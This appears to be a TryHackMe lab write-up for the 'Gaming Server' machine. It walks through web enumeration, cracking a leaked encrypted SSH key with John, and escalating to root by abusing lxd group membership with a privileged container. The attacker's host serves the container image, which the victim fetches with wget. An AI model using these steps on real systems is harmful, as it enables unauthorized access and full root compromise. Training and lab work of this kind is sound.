Posts Gaming Server Writeup [THM]
Post
Cancel

Gaming Server Writeup [THM]

Gaming Server is an easy boot2root Linux machine from Tryhackme, it consists on obtaining an encrypted rsa key and then abuse lxd group privilege to obtain root.

Enumeration

Running nmap :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
  # Nmap 7.80 scan initiated Mon Aug 31 13:11:04 2020 as: nmap -sC -sV -o nmap.txt 10.10.52.248
Nmap scan report for 10.10.52.248
Host is up (0.041s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 34:0e:fe:06:12:67:3e:a4:eb:ab:7a:c4:81:6d:fe:a9 (RSA)
|   256 49:61:1e:f4:52:6e:7b:29:98:db:30:2d:16:ed:f4:8b (ECDSA)
|_  256 b8:60:c4:5b:b7:b2:d0:23:a0:c7:56:59:5c:63:1e:c4 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: House of danak
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Browsing to port 80 we find the following page : Web

By inspecting source code we get a possible user named john :

1
2
3
</body>
<!-- john, please add some actual content to the site! lorem ipsum is horrible to look at. -->
</html>

We run gobuster in order to enumerate web directories:

1
2
3
gobuster dir -u 10.10.141.219 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -t 200 -q
/uploads (Status: 301)
/secret (Status: 301)

Browsing to /secret there is a encrypted id_rsa key : upload

It can be downloaded using wget :

1
wget http://10.10.141.219/secret/secretKey

Exploitation

ssh2john will be used to obtain a crackable hash:

1
/usr/share/john/ssh2john.py secretKey > hash.txt

Now the obtained hash can be cracked using John:

1
2
3
4
5
6
7
8
9
10
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
*****[redacted]          (secretKey)

With the obtained password we can login to ssh as john user :

1
2
3
4
chmod 600 secretKey
ssh john@10.10.141.219 -i secretKey
john@exploitable:~$ id
uid=1000(john) gid=1000(john) groups=1000(john),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd)

Privilege Escalation

Checking the ouput of the id command, we see that user john has lxd group privileges which can be abused to obtain root.

First we will download and build an alpine image in the attacking machine :

1
2
3
git clone https://github.com/saghul/lxd-alpine-builder
cd lxd-alpine-builder
./build-alpine -a i686

Now this image can be transferred by setting up a python server :

1
python -m SimpleHTTPServer 80

On the victim machine :

1
2
3
4
5
john@exploitable:~$ wget http://10.11.14.106/alpine-v3.12-i686-20200831_1433.tar.gz
Connecting to 10.11.14.106:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3197374 (3.0M) [application/gzip]
Saving to: ‘alpine-v3.12-i686-20200831_1433.tar.gz’

Then, we need to import the image, run it and mount the /root directory inside it:

1
2
3
4
5
6
john@exploitable:~$ lxc image import ./alpine-v3.12-i686-20200831_1433.tar.gz --alias myimage
Image imported with fingerprint: 8600391e0acff5b341e213ce0638b5eefb1839d457d57bed31f9ead44d7315a9
john@exploitable:~$ lxc init myimage mycontainer -c security.privileged=true
Creating mycontainer
john@exploitable:~$ lxc config device add mycontainer mydevice disk source=/ path=/mnt/root recursive=true
Device mydevice added to mycontainer

Now we can start the container and execute a shell :

1
2
3
4
john@exploitable:~$ lxc start mycontainer
john@exploitable:~$ lxc exec mycontainer /bin/sh
~ # id
uid=0(root) gid=0(root)

Finally to access root files we need to go to the /mnt directory, where we can cat the flag

1
2
~ # cat /mnt/root/root/root.txt
2*************0****************c [redacted]
This post is licensed under CC BY 4.0 by the author.